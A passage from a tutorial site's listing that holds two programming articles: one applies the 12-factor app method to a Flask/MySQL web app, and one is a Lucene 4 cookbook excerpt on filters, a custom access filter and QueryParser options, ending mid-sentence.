Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7019 Articles
article-image-how-to-build-12-factor-design-microservices-on-docker-part-1
Cody A.
26 Jun 2015
9 min read
Save for later

How to Build 12 Factor Microservices on Docker - Part 1

Cody A.
26 Jun 2015
9 min read
As companies continue to reap benefits of the cloud beyond cost savings, DevOps teams are gradually transforming their infrastructure into a self-serve platform. Critical to this effort is designing applications to be cloud-native and antifragile. In this post series, we will examine the 12 factor methodology for application design, how this design approach interfaces with some of the more popular Platform-as-a-Service (PaaS) providers, and demonstrate how to run such microservices on the Deis PaaS. What began as Service Oriented Architectures in the data center are realizing their full potential as microservices in the cloud, led by innovators such as Netflix and Heroku. Netflix was arguably the first to design their applications to not only be resilient but to be antifragile; that is, by intentionally introducing chaos into their systems, their applications become more stable, scalable, and graceful in the presence of errors. Similarly, by helping thousands of clients building cloud applications, Heroku recognized a set of common patterns emerging and set forth the 12 factor methodology. ANTIFRAGILITY You may have never heard of antifragility. This concept was introduced by Nassim Taleb, the author of Fooled by Randomness and The Black Swan. Essentially, antifragility is what gains from volatility and uncertainty (up to a point). Think of the MySQL server that everyone is afraid to touch lest it crash vs the Cassandra ring which can handle the loss of multiple servers without a problem. In terms more familiar to the tech crowd, a “pet” is fragile while “cattle” are antifragile (or at least robust, that is, they neither gain nor lose from volatility). Adrian Cockroft seems to have discovered this concept with his team at Netflix. During their transition from a data center to Amazon Web Services, they claimed that “the best way to avoid failure is to fail constantly.” (http://techblog.netflix.com/2010/12/5-lessons-weve-learned-using-aws.html) To facilitate this process, one of the first tools Netflix built was Chaos Monkey, the now-infamous tool which kills your Amazon instances to see if and how well your application responds. By constantly injecting failure, their engineers were forced to design their applications to be more fault tolerant, to degrade gracefully, and to be better distributed so as to avoid any Single Points Of Failure (SPOF). As a result, Netflix has a whole suite of tools which form the Netflix PaaS. Many of these have been released as part of the Netflix OSS ecosystem. 12 FACTOR APPS Because many companies want to avoid relying too heavily on tools from any single third-party, it may be more beneficial to look at the concepts underlying such a cloud-native design. This will also help you evaluate and compare multiple options for solving the core issues at hand. Heroku, being a platform on which thousands or millions of applications are deployed, have had to isolate the core design patterns for applications which operate in the cloud and provide an environment which makes such applications easy to build and maintain. These are described as a manifesto entitled the 12-Factor App. The first part of this post walks through the first five factors and reworks a simple python webapp with them in mind. Part 2 continues with the remaining seven factors, demonstrating how this design allows easier integration with cloud-native containerization technologies like Docker and Deis. Let’s say we’re starting with a minimal python application which simply provides a way to view some content from a relational database. We’ll start with a single-file application, app.py. from flask import Flask import mysql.connector as db import json app = Flask(__name__) def execute(query): con = None try: con = db.connect(host='localhost', user='testdb', password='t123', database='testdb') cur = con.cursor() cur.execute(query) return cur.fetchall() except db.Error, e: print "Error %d: %s" % (e.args[0], e.args[1]) return None finally: if con: con.close() def list_users(): users = execute("SELECT id, username, email FROM users") or [] return [{"id": user_id, "username": username, "email": email} for (user_id, username, email) in users] @app.route("/users") def users_index(): return json.dumps(list_users()) if __name__ == "__main__": app.run(host='0.0.0.0', port=5000, debug=True) We can assume you have a simple mysql database setup already. CREATE DATABASE testdb; CREATE TABLE users ( id INT NOT NULL AUTO_INCREMENT, username VARCHAR(80) NOT NULL, email VARCHAR(120) NOT NULL, PRIMARY KEY (id), UNIQUE INDEX (username), UNIQUE INDEX (email) ); INSERT INTO users VALUES (1, "admin", "admin@example.com"); INSERT INTO users VALUES (2, "guest", "guest@example.com"); As you can see, the application is currently implemented as about the most naive approach possible and contained within this single file. We’ll now walk step-by-step through the 12 Factors and apply them to this simple application. THE 12 FACTORS: STEP BY STEP Codebase. A 12-factor app is always tracked in a version control system, such as Git, Mercurial, or Subversion. If there are multiple codebases, its a distributed system in which each component may be a 12-factor app. There are many deploys, or running instances, of each application, including production, staging, and developers' local environments. Since many people are familiar with git today, let’s choose that as our version control system. We can initialize a git repo for our new project. First ensure we’re in the app directory which, at this point, only contains the single app.py file. cd 12factor git init . After adding the single app.py file, we can commit to the repo. git add app.py git commit -m "Initial commit" Dependencies. All dependencies must be explicitly declared and isolated. A 12-factor app never depends on packages to be installed system-wide and uses a dependency isolation tool during execution to stop any system-wide packages from “leaking in.” Good examples are Gem Bundler for Ruby (Gemfile provides declaration and `bundle exec` provides isolation) and Pip/requirements.txt and Virtualenv for Python (where pip/requirements.txt provides declaration and `virtualenv --no-site-packages` provides isolation). We can create and use (source) a virtualenv environment which explicitly isolates the local app’s environment from the global “site-packages” installations. virtualenv env --no-site-packages source env/bin/activate A quick glance at the code we’ll show that we’re only using two dependencies currently, flask and mysql-connector-python, so we’ll add them to the requirements file. echo flask==0.10.1 >> requirements.txt echo mysql-python==1.2.5 >> requirements.txt Let’s use the requirements file to install all the dependencies into our isolated virtualenv. pip install -r requirements.txt Config. An app’s config must be stored in environment variables. This config is what may vary between deploys in developer environments, staging, and production. The most common example is the database credentials or resource handle. We currently have the host, user, password, and database name hardcoded. Hopefully you’ve at least already extracted this to a configuration file; either way, we’ll be moving them to environment variables instead. import os DATABASE_CREDENTIALS = { 'host': os.environ['DATABASE_HOST'], 'user': os.environ['DATABASE_USER'], 'password': os.environ['DATABASE_PASSWORD'], 'database': os.environ['DATABASE_NAME'] } Don’t forget to update the actual connection to use the new credentials object: con = db.connect(**DATABASE_CREDENTIALS) Backing Services. A 12-factor app must make no distinction between a service running locally or as a third-party. For example, a deploy should be able to swap out a local MySQL database with a third-party replacement such as Amazon RDS without any code changes, just by updating a URL or other handle/credentials inside the config. Using a database abstraction layer such as SQLAlchemy (or your own adapter) lets you treat many backing services similarly so that you can switch between them with a single configuration parameter. In this case, it has the added advantage of serving as an Object Relational Mapper to better encapsulate our database access logic. We can replace the hand-rolled execute function and SELECT query with a model object from flask.ext.sqlalchemy import SQLAlchemy app = Flask(__name__) app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL'] db = SQLAlchemy(app) class User(db.Model): __tablename__ = 'users' id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(80), unique=True) email = db.Column(db.String(120), unique=True) def __init__(self, username, email): self.username = username self.email = email def __repr__(self): return '<User %r>' % self.username @app.route("/users") def users_index(): to_json = lambda user: {"id": user.id, "name": user.username, "email": user.email} return json.dumps([to_json(user) for user in User.query.all()]) Now we set the DATABASE_URL environment property to something like export DATABASE_URL=mysql://testdb:t123@localhost/testdb But its should be easy to switch to Postgres or Amazon RDS (still backed by MySQL). DATABASE_URL=postgresql://testdb:t123@localhost/testdb We’ll continue this demo using a MySQL cluster provided by Amazon RDS. DATABASE_URL=mysql://sa:mypwd@mydbinstance.abcdefghijkl.us-west-2.rds.amazonaws.com/mydb As you can see, this makes attaching and detaching from different backing services trivial from a code perspective, allowing you to focus on more challenging issues. This is important during the early stages of code because it allows you to performance test multiple databases and third-party providers against one another, and in general keeps with the notion of avoiding vendor lock-in. In Part 2, we'll continue reworking this application so that it fully conforms to the 12 Factors. The remaining eight factors concern the overall application design and how it interacts with the execution environment in which its operated. We’ll assume that we’re operating the app in a multi-container Docker environment. This container-up approach provides the most flexibility and control over your execution environment. We’ll then conclude the article by deploying our application to Deis, a vertically integrated Docker-based PaaS, to demonstrate the tradeoff of configuration vs convention in selecting your own PaaS. About the Author Cody A. Ray is an inquisitive, tech-savvy, entrepreneurially-spirited dude. Currently, he is a software engineer at Signal, an amazing startup in downtown Chicago, where he gets to work with a dream team that’s changing the service model underlying the Internet.
Read more
  • 0
  • 0
  • 34595

article-image-querying-and-filtering-data
Packt
25 Jun 2015
28 min read
Save for later

Querying and Filtering Data

Packt
25 Jun 2015
28 min read
In this article by Edwood Ng and Vineeth Mohan, authors of the book Lucene 4 Cookbook, we will cover the following recipes: Performing advanced filtering Creating a custom filter Searching with QueryParser TermQuery and TermRangeQuery BooleanQuery PrefixQuery and WildcardQuery PhraseQuery and MultiPhraseQuery FuzzyQuery (For more resources related to this topic, see here.) When it comes to search application, usability is always a key element that either makes or breaks user impression. Lucene does an excellent job of giving you the essential tools to build and search an index. In this article, we will look into some more advanced techniques to query and filter data. We will arm you with more knowledge to put into your toolbox so that you can leverage your Lucene knowledge to build a user-friendly search application. Performing advanced filtering Before we start, let us try to revisit these questions: what is a filter and what is it for? In simple terms, a filter is used to narrow the search space or, in another words, search within a search. Filter and Query may seem to provide the same functionality, but there is a significant difference between the two. Scores are calculated in querying to rank results, based on their relevancy to the search terms, while a filter has no effect on scores. It's not uncommon that users may prefer to navigate through a hierarchy of filters in order to land on the relevant results. You may often find yourselves in a situation where it is necessary to refine a result set so that users can continue to search or navigate within a subset. With the ability to apply filters, we can easily provide such search refinements. Another situation is data security where some parts of the data in the index are protected. You may need to include an additional filter behind the scene that's based on user access level so that users are restricted to only seeing items that they are permitted to access. In both of these contexts, Lucene's filtering features will provide the capability to achieve the objectives. Lucene has a few built-in filters that are designed to fit most of the real-world applications. If you do find yourself in a position where none of the built-in filters are suitable for the job, you can rest assured that Lucene's expansibility will allow you to build your own custom filters. Let us take a look at Lucene's built-in filters: TermRangeFilter: This is a filter that restricts results to a range of terms that are defined by lower bound and upper bound of a submitted range. This filter is best used on a single-valued field because on a tokenized field, any tokens within a range will return by this filter. This is for textual data only. NumericRangeFilter: Similar to TermRangeFilter, this filter restricts results to a range of numeric values. FieldCacheRangeFilter: This filter runs on top of the number of range filters, including TermRangeFilter and NumericRangeFilter. It caches filtered results using FieldCache for improved performance. FieldCache is stored in the memory, so performance boost can be upward of 100x faster than the normal range filter. Because it uses FieldCache, it's best to use this on a single-valued field only. This filter will not be applicable for multivalued field and when the available memory is limited, since it maintains FieldCache (in memory) on filtered results. QueryWrapperFilter: This filter acts as a wrapper around a Query object. This filter is useful when you have complex business rules that are already defined in a Query and would like to reuse for other business purposes. It constructs a Query to act like a filter so that it can be applied to other Queries. Because this is a filter, scoring results from the Query within is irrelevant. PrefixFilter: This filter restricts results that match what's defined in the prefix. This is similar to a substring match, but limited to matching results with a leading substring only. FieldCacheTermsFilter: This is a term filter that uses FieldCache to store the calculated results in memory. This filter works on a single-valued field only. One use of it is when you have a category field where results are usually shown by categories in different pages. The filter can be used as a demarcation by categories. FieldValueFilter: This filter returns a document containing one or more values on the specified field. This is useful as a preliminary filter to ensure that certain fields exist before querying. CachingWrapperFilter: This is a wrapper that adds a caching layer to a filter to boost performance. Note that this filter provides a general caching layer; it should be applied on a filter that produces a reasonably small result set, such as an exact match. Otherwise, larger results may unnecessarily drain the system's resources and can actually introduce performance issues. If none of the above filters fulfill your business requirements, you can build your own, extending the Filter class and implementing its abstract method getDocIdSet (AtomicReaderContext, Bits). How to do it... Let's set up our test case with the following code: Analyzer analyzer = new StandardAnalyzer(); Directory directory = new RAMDirectory(); IndexWriterConfig config = new   IndexWriterConfig(Version.LATEST, analyzer); IndexWriter indexWriter = new IndexWriter(directory, config); Document doc = new Document(); StringField stringField = new StringField("name", "",   Field.Store.YES); TextField textField = new TextField("content", "",   Field.Store.YES); IntField intField = new IntField("num", 0, Field.Store.YES); doc.removeField("name"); doc.removeField("content"); doc.removeField("num"); stringField.setStringValue("First"); textField.setStringValue("Humpty Dumpty sat on a wall,"); intField.setIntValue(100); doc.add(stringField); doc.add(textField); doc.add(intField); indexWriter.addDocument(doc); doc.removeField("name"); doc.removeField("content"); doc.removeField("num"); stringField.setStringValue("Second"); textField.setStringValue("Humpty Dumpty had a great fall."); intField.setIntValue(200); doc.add(stringField); doc.add(textField); doc.add(intField); indexWriter.addDocument(doc); doc.removeField("name"); doc.removeField("content"); doc.removeField("num"); stringField.setStringValue("Third"); textField.setStringValue("All the king's horses and all the king's men"); intField.setIntValue(300); doc.add(stringField); doc.add(textField); doc.add(intField); indexWriter.addDocument(doc); doc.removeField("name"); doc.removeField("content"); doc.removeField("num"); stringField.setStringValue("Fourth"); textField.setStringValue("Couldn't put Humpty together   again."); intField.setIntValue(400); doc.add(stringField); doc.add(textField); doc.add(intField); indexWriter.addDocument(doc); indexWriter.commit(); indexWriter.close(); IndexReader indexReader = DirectoryReader.open(directory); IndexSearcher indexSearcher = new IndexSearcher(indexReader); How it works… The preceding code adds four documents into an index. The four documents are: Document 1 Name: First Content: Humpty Dumpty sat on a wall, Num: 100 Document 2 Name: Second Content: Humpty Dumpty had a great fall. Num: 200 Document 3 Name: Third Content: All the king's horses and all the king's men Num: 300 Document 4 Name: Fourth Content: Couldn't put Humpty together again. Num: 400 Here is our standard test case: IndexReader indexReader = DirectoryReader.open(directory); IndexSearcher indexSearcher = new IndexSearcher(indexReader); Query query = new TermQuery(new Term("content", "humpty")); TopDocs topDocs = indexSearcher.search(query, FILTER, 100); System.out.println("Searching 'humpty'"); for (ScoreDoc scoreDoc : topDocs.scoreDocs) {    doc = indexReader.document(scoreDoc.doc);    System.out.println("name: " + doc.getField("name").stringValue() +        " - content: " + doc.getField("content").stringValue() + " - num: " + doc.getField("num").stringValue()); } indexReader.close(); Running the code as it is will produce the following output, assuming the FILTER variable is declared: Searching 'humpty' name: First - content: Humpty Dumpty sat on a wall, - num: 100 name: Second - content: Humpty Dumpty had a great fall. - num: 200 name: Fourth - content: Couldn't put Humpty together again. - num: 400 This is a simple search on the word humpty. The search would return the first, second, and fourth sentences. Now, let's take a look at a TermRangeFilter example: TermRangeFilter termRangeFilter = TermRangeFilter.newStringRange("name", "A", "G", true, true); Applying this filter to preceding search (by setting FILTER as termRangeFilter) will produce the following output: Searching 'humpty' name: First - content: Humpty Dumpty sat on a wall, - num: 100 name: Fourth - content: Couldn't put Humpty together again. - num: 400 Note that the second sentence is missing from the results due to this filter. This filter removes documents with name outside of A through G. Both first and fourth sentences start with F that's within the range so their results are included. The second sentence's name value Second is outside the range, so the document is not considered by the query. Let's move on to NumericRangeFilter: NumericRangeFilter numericRangeFilter = NumericRangeFilter.newIntRange("num", 200, 400, true, true); This filter will produce the following results: Searching 'humpty' name: Second - content: Humpty Dumpty had a great fall. - num: 200 name: Fourth - content: Couldn't put Humpty together again. - num: 400 Note that the first sentence is missing from results. It's because its num 100 is outside the specified numeric range 200 to 400 in NumericRangeFilter. Next one is FieldCacheRangeFilter: FieldCacheRangeFilter fieldCacheTermRangeFilter = FieldCacheRangeFilter.newStringRange("name", "A", "G", true, true); The output of this filter is similar to the TermRangeFilter example: Searching 'humpty' name: First - content: Humpty Dumpty sat on a wall, - num: 100 name: Fourth - content: Couldn't put Humpty together again. - num: 400 This filter provides a caching layer on top of TermRangeFilter. Results are similar, but performance is a lot better because the calculated results are cached in memory for the next retrieval. Next is QueryWrapperFiler: QueryWrapperFilter queryWrapperFilter = new QueryWrapperFilter(new TermQuery(new Term("content", "together"))); This example will produce this result: Searching 'humpty' name: Fourth - content: Couldn't put Humpty together again. - num: 400 This filter wraps around TermQuery on term together on the content field. Since the fourth sentence is the only one that contains the word "together" search results is limited to this sentence only. Next one is PrefixFilter: PrefixFilter prefixFilter = new PrefixFilter(new Term("name", "F")); This filter produces the following: Searching 'humpty' name: First - content: Humpty Dumpty sat on a wall, - num: 100 name: Fourth - content: Couldn't put Humpty together again. - num: 400 This filter limits results where the name field begins with letter F. In this case, the first and fourth sentences both have the name field that begins with F (First and Fourth); hence, the results. Next is FieldCacheTermsFilter: FieldCacheTermsFilter fieldCacheTermsFilter = new FieldCacheTermsFilter("name", "First"); This filter produces the following: Searching 'humpty' name: First - content: Humpty Dumpty sat on a wall, - num: 100 This filter limits results with the name containing the word first. Since the first sentence is the only one that contains first, only one sentence is returned in search results. Next is FieldValueFilter: FieldValueFilter fieldValueFilter = new FieldValueFilter("name1"); This would produce the following: Searching 'humpty' Note that there are no results because this filter limits results in which there is at least one value on the filed name1. Since the name1 field doesn't exist in our current example, no documents are returned by this filter; hence, zero results. Next is CachingWrapperFilter: TermRangeFilter termRangeFilter = TermRangeFilter.newStringRange("name", "A", "G", true, true); CachingWrapperFilter cachingWrapperFilter = new CachingWrapperFilter(termRangeFilter); This wrapper wraps around the same TermRangeFilter from above, so the result produced is similar: Searching 'humpty' name: First - content: Humpty Dumpty sat on a wall, - num: 100 name: Fourth - content: Couldn't put Humpty together again. - num: 400 Filters work in conjunction with Queries to refine the search results. As you may have already noticed, the benefit of Filter is its ability to cache results, while Query calculates in real time. When choosing between Filter and Query, you will want to ask yourself whether the search (or filtering) will be repeated. Provided you have enough memory allocation, a cached Filter will always provide a positive impact to search experiences. Creating a custom filter Now that we've seen numerous examples on Lucene's built-in Filters, we are ready for a more advanced topic, custom filters. There are a few important components we need to go over before we start: FieldCache, SortedDocValues, and DocIdSet. We will be using these items in our example to help you gain practical knowledge on the subject. In the FieldCache, as you already learned, is a cache that stores field values in memory in an array structure. It's a very simple data structure as the slots in the array basically correspond to DocIds. This is also the reason why FieldCache only works for a single-valued field. A slot in an array can only hold a single value. Since this is just an array, the lookup time is constant and very fast. The SortedDocValues has two internal data mappings for values' lookup: a dictionary mapping an ordinal value to a field value and a DocId to an ordinal value (for the field value) mapping. In the dictionary data structure, the values are deduplicated, dereferenced, and sorted. There are two methods of interest in this class: getOrd(int) and lookupTerm(BytesRef). The getOrd(int) returns an ordinal for a DocId (int) and lookupTerm(BytesRef) returns an ordinal for a field value. This data structure is the opposite of the inverted index structure, as this provides a DocId to value lookup (similar to FieldCache), instead of value to a DocId lookup. DocIdSet, as the name implies, is a set of DocId. A FieldCacheDocIdSet subclass we will be using is a combination of this set and FieldCache. It iterates through the set and calls matchDoc(int) to find all the matching documents to be returned. In our example, we will be building a simple user security Filter to determine which documents are eligible to be viewed by a user based on the user ID and group ID. The group ID is assumed to be hereditary, where as a smaller ID inherits rights from a larger ID. For example, the following will be our group ID model in our implementation: 10 – admin 20 – manager 30 – user 40 – guest A user with group ID 10 will be able to access documents where its group ID is 10 or above. How to do it... Here is our custom Filter, UserSecurityFilter: public class UserSecurityFilter extends Filter {   private String userIdField; private String groupIdField; private String userId; private String groupId;   public UserSecurityFilter(String userIdField, String groupIdField, String userId, String groupId) {    this.userIdField = userIdField;    this.groupIdField = groupIdField;    this.userId = userId;    this.groupId = groupId; }   public DocIdSet getDocIdSet(AtomicReaderContext context, Bits acceptDocs) throws IOException {    final SortedDocValues userIdDocValues = FieldCache.DEFAULT.getTermsIndex(context.reader(), userIdField);    final SortedDocValues groupIdDocValues = FieldCache.DEFAULT.getTermsIndex(context.reader(), groupIdField);      final int userIdOrd = userIdDocValues.lookupTerm(new BytesRef(userId));    final int groupIdOrd = groupIdDocValues.lookupTerm(new BytesRef(groupId));      return new FieldCacheDocIdSet(context.reader().maxDoc(), acceptDocs) {      @Override      protected final boolean matchDoc(int doc) {        final int userIdDocOrd = userIdDocValues.getOrd(doc);        final int groupIdDocOrd = groupIdDocValues.getOrd(doc);        return userIdDocOrd == userIdOrd || groupIdDocOrd >= groupIdOrd;      }    }; } } This Filter accepts four arguments in its constructor: userIdField: This is the field name for user ID groupIdField: This is the field name for group ID userId: This is the current session's user ID groupId: This is the current session's group ID of the user Then, we implement getDocIdSet(AtomicReaderContext, Bits) to perform our filtering by userId and groupId. We first acquire two SortedDocValues, one for the user ID and one for the group ID, based on the Field names we obtained from the constructor. Then, we look up the ordinal values for the current session's user ID and group ID. The return value is a new FieldCacheDocIdSet object implementing its matchDoc(int) method. This is where we compare both the user ID and group ID to determine whether a document is viewable by the user. A match is true when the user ID matches and the document's group ID is greater than or equal to the user's group ID. To test this Filter, we will set up our index as follows:    Analyzer analyzer = new StandardAnalyzer();    Directory directory = new RAMDirectory();    IndexWriterConfig config = new IndexWriterConfig(Version.LATEST, analyzer);    IndexWriter indexWriter = new IndexWriter(directory, config);    Document doc = new Document();    StringField stringFieldFile = new StringField("file", "", Field.Store.YES);    StringField stringFieldUserId = new StringField("userId", "", Field.Store.YES);    StringField stringFieldGroupId = new StringField("groupId", "", Field.Store.YES);      doc.removeField("file"); doc.removeField("userId"); doc.removeField("groupId");    stringFieldFile.setStringValue("Z:\shared\finance\2014- sales.xls");    stringFieldUserId.setStringValue("1001");    stringFieldGroupId.setStringValue("20");    doc.add(stringFieldFile); doc.add(stringFieldUserId); doc.add(stringFieldGroupId);    indexWriter.addDocument(doc);      doc.removeField("file"); doc.removeField("userId"); doc.removeField("groupId");    stringFieldFile.setStringValue("Z:\shared\company\2014- policy.doc");    stringFieldUserId.setStringValue("1101");    stringFieldGroupId.setStringValue("30");    doc.add(stringFieldFile); doc.add(stringFieldUserId);    doc.add(stringFieldGroupId);    indexWriter.addDocument(doc);    doc.removeField("file"); doc.removeField("userId");    doc.removeField("groupId");    stringFieldFile.setStringValue("Z:\shared\company\2014- terms-and-conditions.doc");    stringFieldUserId.setStringValue("1205");    stringFieldGroupId.setStringValue("40");    doc.add(stringFieldFile); doc.add(stringFieldUserId);    doc.add(stringFieldGroupId);    indexWriter.addDocument(doc);    indexWriter.commit();    indexWriter.close(); The setup adds three documents to our index with different user IDs and group ID settings in each document, as follows: UserSecurityFilter userSecurityFilter = new UserSecurityFilter("userId", "groupId", "1001", "40"); IndexReader indexReader = DirectoryReader.open(directory); IndexSearcher indexSearcher = new IndexSearcher(indexReader); Query query = new MatchAllDocsQuery(); TopDocs topDocs = indexSearcher.search(query, userSecurityFilter,   100); for (ScoreDoc scoreDoc : topDocs.scoreDocs) { doc = indexReader.document(scoreDoc.doc); System.out.println("file: " + doc.getField("file").stringValue() +" - userId: " + doc.getField("userId").stringValue() + " - groupId: " +       doc.getField("groupId").stringValue());} indexReader.close(); We initialize UserSecurityFilter with the matching names for user ID and group ID fields, and set it up with user ID 1001 and group ID 40. For our test and search, we use MatchAllDocsQuery to basically search without any queries (as it will return all the documents). Here is the output from the code: file: Z:sharedfinance2014-sales.xls - userId: 1001 - groupId: 20 file: Z:sharedcompany2014-terms-and-conditions.doc - userId: 1205 - groupId: 40 The search specifically filters by user ID 1001, so the first document is returned because its user ID is also 1001. The third document is returned because its group ID, 40, is greater than or equal to the user's group ID, which is also 40. Searching with QueryParser QueryParser is an interpreter tool that transforms a search string into a series of Query clauses. It's not absolutely necessary to use QueryParser to perform a search, but it's a great feature that empowers users by allowing the use of search modifiers. A user can specify a phrase match by putting quotes (") around a phrase. A user can also control whether a certain term or phrase is required by putting a plus ("+") sign in front of the term or phrase, or use a minus ("-") sign to indicate that the term or phrase must not exist in results. For Boolean searches, the user can use AND and OR to control whether all terms or phrases are required. To do a field-specific search, you can use a colon (":") to specify a field for a search (for example, content:humpty would search for the term "humpty" in the field "content"). For wildcard searches, you can use the standard wildcard character asterisk ("*") to match 0 or more characters, or a question mark ("?") for matching a single character. As you can see, the general syntax for a search query is not complicated, though the more advanced modifiers can seem daunting to new users. In this article, we will cover more advanced QueryParser features to show you what you can do to customize a search. How to do it.. Let's look at the options that we can set in QueryParser. The following is a piece of code snippet for our setup: Analyzer analyzer = new StandardAnalyzer(); Directory directory = new RAMDirectory(); IndexWriterConfig config = new IndexWriterConfig(Version.LATEST, analyzer); IndexWriter indexWriter = new IndexWriter(directory, config); Document doc = new Document(); StringField stringField = new StringField("name", "", Field.Store.YES); TextField textField = new TextField("content", "", Field.Store.YES); IntField intField = new IntField("num", 0, Field.Store.YES);   doc.removeField("name"); doc.removeField("content"); doc.removeField("num"); stringField.setStringValue("First"); textField.setStringValue("Humpty Dumpty sat on a wall,"); intField.setIntValue(100); doc.add(stringField); doc.add(textField); doc.add(intField); indexWriter.addDocument(doc);   doc.removeField("name"); doc.removeField("content"); doc.removeField("num"); stringField.setStringValue("Second"); textField.setStringValue("Humpty Dumpty had a great fall."); intField.setIntValue(200); doc.add(stringField); doc.add(textField); doc.add(intField); indexWriter.addDocument(doc);   doc.removeField("name"); doc.removeField("content"); doc.removeField("num"); stringField.setStringValue("Third"); textField.setStringValue("All the king's horses and all the king's men"); intField.setIntValue(300); doc.add(stringField); doc.add(textField); doc.add(intField); indexWriter.addDocument(doc);   doc.removeField("name"); doc.removeField("content"); doc.removeField("num"); stringField.setStringValue("Fourth"); textField.setStringValue("Couldn't put Humpty together again."); intField.setIntValue(400); doc.add(stringField); doc.add(textField); doc.add(intField); indexWriter.addDocument(doc);   indexWriter.commit(); indexWriter.close();   IndexReader indexReader = DirectoryReader.open(directory); IndexSearcher indexSearcher = new IndexSearcher(indexReader); QueryParser queryParser = new QueryParser("content", analyzer); // configure queryParser here Query query = queryParser.parse("humpty"); TopDocs topDocs = indexSearcher.search(query, 100); We add four documents and instantiate a QueryParser object with a default field and an analyzer. We will be using the same analyzer that was used in indexing to ensure that we apply the same text treatment to maximize matching capability. Wildcard search The query syntax for a wildcard search is the asterisk ("*") or question mark ("?") character. Here is a sample query: Query query = queryParser.parse("humpty*"); This query will return the first, second, and fourth sentences. By default, QueryParser does not allow a leading wildcard character because it has a significant performance impact. A leading wildcard would trigger a full scan on the index since any term can be a potential match. In essence, even an inverted index would become rather useless for a leading wildcard character search. However, it's possible to override this default setting to allow a leading wildcard character by calling setAllowLeadingWildcard(true). You can go ahead and run this example with different search strings to see how this feature works. Depending on where the wildcard character(s) is placed, QueryParser will produce either a PrefixQuery or WildcardQuery. In this specific example in which there is only one wildcard character and it's not the leading character, a PrefixQuery will be produced. Term range search We can produce a TermRangeQuery by using TO in a search string. The range has the following syntax: [start TO end] – inclusive {start TO end} – exclusive As indicated, the angle brackets ( [ and ] ) is inclusive of start and end terms, and curly brackets ( { and } ) is exclusive of start and end terms. It's also possible to mix these brackets to inclusive on one side and exclusive on the other side. Here is a code snippet: Query query = queryParser.parse("[aa TO c]"); This search will return the third and fourth sentences, as their beginning words are All and Couldn't, which are within the range. You can optionally analyze the range terms with the same analyzer by setting setAnalyzeRangeTerms(true). Autogenerated phrase query QueryParser can automatically generate a PhraseQuery when there is more than one term in a search string. Here is a code snippet: queryParser.setAutoGeneratePhraseQueries(true); Query query = queryParser.parse("humpty+dumpty+sat"); This search will generate a PhraseQuery on the phrase humpty dumpty sat and will return the first sentence. Date resolution If you have a date field (by using DateTools to convert date to a string format) and would like to do a range search on date, it may be necessary to match the date resolution on a specific field. Here is a code snippet on setting the Date resolution: queryParser.setDateResolution("date", DateTools.Resolution.DAY); queryParser.setLocale(Locale.US); queryParser.setTimeZone(TimeZone.getTimeZone("Am erica/New_York")); This example sets the resolution to day granularity, locale to US, and time zone to New York. The locale and time zone settings are specific to the date format only. Default operator The default operator on a multiterm search string is OR. You can change the default to AND so all the terms are required. Here is a code snippet that will require all the terms in a search string: queryParser.setDefaultOperator(QueryParser.Operator.AND); Query query = queryParser.parse("humpty dumpty"); This example will return first and second sentences as these are the only two sentences with both humpty and dumpty. Enable position increments This setting is enabled by default. Its purpose is to maintain a position increment of the token that follows an omitted token, such as a token filtered by a StopFilter. This is useful in phrase queries when position increments may be important for scoring. Here is an example on how to enable this setting: queryParser.setEnablePositionIncrements(true); Query query = queryParser.parse(""humpty dumpty""); In our scenario, it won't change our search results. This attribute only enables position increments information to be available in the resulting PhraseQuery. Fuzzy query Lucene's fuzzy search implementation is based on Levenshtein distance. It compares two strings and finds out the number of single character changes that are needed to transform one string to another. The resulting number indicates the closeness of the two strings. In a fuzzy search, a threshold number of edits is used to determine if the two strings are matched. To trigger a fuzzy match in QueryParser, you can use the tilde ~ character. There are a couple configurations in QueryParser to tune this type of query. Here is a code snippet: queryParser.setFuzzyMinSim(2f); queryParser.setFuzzyPrefixLength(3); Query query = queryParser.parse("hump~"); This example will return first, second, and fourth sentences as the fuzzy match matches hump to humpty because these two words are missed by two characters. We tuned the fuzzy query to a minimum similarity to two in this example. Lowercase expanded term This configuration determines whether to automatically lowercase multiterm queries. An analyzer can do this already, so this is more like an overriding configuration that forces multiterm queries to be lowercased. Here is a code snippet: queryParser.setLowercaseExpandedTerms(true); Query query = queryParser.parse(""Humpty Dumpty""); This code will lowercase our search string before search execution. Phrase slop Phrase search can be tuned to allow some flexibility in phrase matching. By default, phrase match is exact. Setting a slop value will give it some tolerance on terms that may not always be matched consecutively. Here is a code snippet that will demonstrate this feature: queryParser.setPhraseSlop(3); Query query = queryParser.parse(""Humpty Dumpty wall""); Without setting a phrase slop, this phrase Humpty Dumpty wall will not have any matches. By setting phrase slop to three, it allows some tolerance so that this search will now return the first sentence. Go ahead and play around with this setting in order to get more familiarized with its behavior. TermQuery and TermRangeQuery A TermQuery is a very simple query that matches documents containing a specific term. The TermRangeQuery is, as its name implies, a term range with a lower and upper boundary for matching. How to do it.. Here are a couple of examples on TermQuery and TermRangeQuery: query = new TermQuery(new Term("content", "humpty")); query = new TermRangeQuery("content", new BytesRef("a"), new BytesRef("c"), true, true); The first line is a simple query that matches the term humpty in the content field. The second line is a range query matching documents with the content that's sorted within a and c. BooleanQuery A BooleanQuery is a combination of other queries in which you can specify whether each subquery must, must not, or should match. These options provide the foundation to build up to logical operators of AND, OR, and NOT, which you can use in QueryParser. Here is a quick review on QueryParser syntax for BooleanQuery: "+" means required; for example, a search string +humpty dumpty equates to must match humpty and should match "dumpty" "-" means must not match; for example, a search string -humpty dumpty equates to must not match humpty and should match dumpty AND, OR, and NOT are pseudo Boolean operators. Under the hood, Lucene uses BooleanClause.Occur to model these operators. The options for occur are MUST, MUST_NOT, and SHOULD. In an AND query, both terms must match. In an OR query, both terms should match. Lastly, in a NOT query, the term MUST_NOT exists. For example, humpty AND dumpty means must match both humpty and dumpty, humpty OR dumpty means should match either or both humpty or dumpty, and NOT humpty means the term humpty must not exist in matching. As mentioned, rudimentary clauses of BooleanQuery have three option: must match, must not match, and should match. These options allow us to programmatically create Boolean operations through an API. How to do it.. Here is a code snippet that 